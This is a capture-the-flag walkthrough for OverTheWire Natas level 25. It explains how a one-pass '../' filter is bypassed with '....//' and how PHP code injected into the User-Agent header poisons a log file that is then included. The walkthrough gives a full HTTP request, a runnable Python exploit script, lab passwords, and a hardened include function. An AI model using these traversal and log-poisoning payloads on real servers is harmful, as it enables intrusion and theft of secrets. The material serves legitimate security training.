Natas · OverTheWire

Natas Level 25 → Level 26

Level 25

Username : natas25
Password : GHF6X7YwACaYYssHVY05cFq83hRktl4c
URL : http://natas25.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas25 application using the credentials provided above.


The application shows us a quote and lets us change the language in which the quote is displayed. Let’s check the source code to learn more about how the language switch is implemented.


The application utilizes the following functions:

setLanguage()
safeinclude($filename)
listFiles($path)
logRequest($message)

The setLanguage() function includes a file by calling safeinclude(). safeinclude() checks for path traversal by replacing "../" with an empty string, which removes every occurrence of "../" present in the filename. However, this replacement runs only once and never re-scans the string it produces, so we can craft a filename that turns into a traversal sequence only after the filter has run.

To read /etc/hosts we first need to climb up to the root directory and then descend into etc/hosts.
Consider the filename "....//....//....//....//etc/hosts". Each "....//" loses its inner "../" and collapses to "../", so after one pass through the filter the application is left with ../../../../etc/hosts.
That is a valid path, and the application includes the file and prints its contents.


safeinclude() also aborts if the filename contains "natas_webpass", so requesting the password file for the next level directly causes the application to exit.
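The two filter behaviours described above, modelled in Python as an added example (this is not the level’s PHP and not the author’s code): vulnerable_safeinclude() reproduces the single-pass "../" removal followed by the natas_webpass check, and hardened_safeinclude() shows the fix a practitioner would actually want, canonicalising the path and requiring it to stay inside an allowlisted directory instead of stripping bad substrings. The directory name language/ that the lang value is appended to is an assumption; the page’s ....//logs/natas25_ST.log payload, which climbs exactly one level to reach logs/, implies the include is resolved relative to some such subdirectory. Note that against the hardened version the ....// trick is simply a strange filename that stays inside language/, while a plain ../ or an absolute path is rejected.

```python
import posixpath
from typing import Optional

# Assumed: the level appends the lang value to this directory name. The page's
# "....//logs/natas25_ST.log" payload climbs exactly one level to reach logs/,
# which implies includes are resolved relative to a subdirectory like this one.
LANG_DIR = "language"


def inside_lang_dir(path: str) -> bool:
    """True when the lexically normalised path stays below LANG_DIR."""
    return posixpath.normpath(path).startswith(LANG_DIR + "/")


def vulnerable_safeinclude(filename: str) -> Optional[str]:
    """Model of safeinclude() as the walkthrough describes it.

    Returns the relative path that would reach include(), or None when the
    natas_webpass blocklist aborts the request. file_exists() is not modelled.
    """
    if "../" in filename:
        # One pass: every "../" present *now* is removed, but the string that
        # results is never re-scanned, so "....//" collapses into a fresh "../".
        filename = filename.replace("../", "")
    if "natas_webpass" in filename:
        return None  # the original calls exit(-1) here
    return posixpath.join(LANG_DIR, filename)


def hardened_safeinclude(filename: str) -> Optional[str]:
    """Canonicalise, then enforce containment; no substring stripping at all.

    Whatever the input looks like, the resolved path must stay inside
    LANG_DIR. Absolute paths are rejected as well, because posixpath.join
    discards LANG_DIR when the second argument is absolute. Production code
    should also resolve symlinks (os.path.realpath) before the containment check.
    """
    resolved = posixpath.normpath(posixpath.join(LANG_DIR, filename))
    if not resolved.startswith(LANG_DIR + "/"):
        return None
    return resolved


if __name__ == "__main__":
    for lang in ("en", "....//....//....//....//etc/hosts",
                 "....//logs/natas25_ST.log", "....//etc/natas_webpass/natas26"):
        vuln = vulnerable_safeinclude(lang)
        escaped = vuln is not None and not inside_lang_dir(vuln)
        print(f"{lang!r:40} vulnerable={vuln!r} escapes={escaped} "
              f"hardened={hardened_safeinclude(lang)!r}")
```

The vulnerable path for the page’s /etc/hosts payload normalises to something outside language/, which is exactly what the screenshot on the page shows happening; the same input fed to hardened_safeinclude() never leaves the directory.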


Therefore, we need another way to get our own code into the application. On closer inspection, logRequest() also writes our browser’s User-Agent header into the log. That value is entirely under our control and is written without any validation or escaping. So if we can make the application include a file that contains our own PHP, it will execute that code, and we may be able to retrieve the password for the next level.

logRequest() appends its entry to /var/www/natas/natas25/logs/natas25_<session_id()>.log. The value of session_id() is our PHPSESSID cookie, so we control the log file name as well (stick to letters and digits, since PHP discards a cookie that is not a valid session id and starts a fresh session). If we place a PHP include of the password file in the log via the User-Agent header and then include that log file through the lang parameter, the password will be printed. Because the traversal check itself calls logRequest() before the include runs, a single request both poisons the log and includes it. Since I’m using Burp Proxy, I sent the following request to get the password.

GET /?lang=....//logs/natas25_ST.log HTTP/1.1
Host: natas25.natas.labs.overthewire.org
Authorization: Basic bmF0YXMyNTpHSEY2WDdZd0FDYVlZc3NIVlkwNWNGcTgzaFJrdGw0Yw==
Upgrade-Insecure-Requests: 1
User-Agent: <? include "/etc/natas_webpass/natas26" ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://natas25.natas.labs.overthewire.org/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ST
Connection: close
Content-Length: 0

The PHP in the User-Agent header is written into /var/www/natas/natas25/logs/natas25_ST.log and executed when that file is included, so the contents of the password file end up in the response. You can choose any value for PHPSESSID, but make sure to use the same value in the lang path. The short <? ... ?> tag works here because short_open_tag is enabled on the target; <?php ... ?> works regardless of that setting.

The application responds with the password for the next level.
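The poisoning request above, rebuilt as a runnable Python script (an added example, not the author’s Burp session and not part of the page). It constructs the same headers from the level credentials, so the Authorization value can be checked against the one in the request above, and run() sends the single GET with http.client. Two things are my own choices rather than the page’s: the payload uses the long <?php ... ?> form so it does not depend on short_open_tag, and extract_password() assumes the password is the only 32-character alphanumeric token in the returned page.

```python
import base64
import http.client
import re
from typing import Optional

HOST = "natas25.natas.labs.overthewire.org"
USER = "natas25"
PASSWORD = "GHF6X7YwACaYYssHVY05cFq83hRktl4c"
# Arbitrary, letters and digits only (PHP discards an invalid session id
# cookie); it must appear both in the Cookie header and in the lang path.
SESSION_ID = "ST"
TARGET = "/etc/natas_webpass/natas26"
LOG_PREFIX = "natas25_"   # from /var/www/natas/natas25/logs/natas25_<sid>.log


def basic_auth_header(user: str, password: str) -> str:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def log_include_path(session_id: str) -> str:
    """lang value that one str_replace('../', '') turns into ../logs/<sid>.log."""
    return f"....//logs/{LOG_PREFIX}{session_id}.log"


def poison_payload(target: str) -> str:
    # The page used the short form `<? include "..." ?>`; the long form below
    # works whether or not short_open_tag is enabled. This is my choice.
    return f'<?php include "{target}"; ?>'


def build_request(session_id: str, target: str):
    """Method, path and headers for the single request that poisons and reads."""
    path = f"/?lang={log_include_path(session_id)}"
    headers = {
        "Authorization": basic_auth_header(USER, PASSWORD),
        "User-Agent": poison_payload(target),
        "Cookie": f"PHPSESSID={session_id}",
        "Connection": "close",
    }
    return "GET", path, headers


def extract_password(body: str) -> Optional[str]:
    """Assumption: the natas password is the only 32-char alphanumeric token."""
    match = re.search(r"\b([A-Za-z0-9]{32})\b", body)
    return match.group(1) if match else None


def run() -> Optional[str]:
    method, path, headers = build_request(SESSION_ID, TARGET)
    conn = http.client.HTTPConnection(HOST, 80, timeout=15)
    conn.request(method, path, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    password = extract_password(body)
    print(resp.status, password)
    return password


if __name__ == "__main__":
    run()
```

The helpers are kept separate from run() so the request can be inspected (or replayed through a proxy) without touching the network; the same pattern, one request that both writes and includes the log, is what the Burp request above does by hand.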

Level 26

Username : natas26
Password : oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
URL : http://natas26.natas.labs.overthewire.org
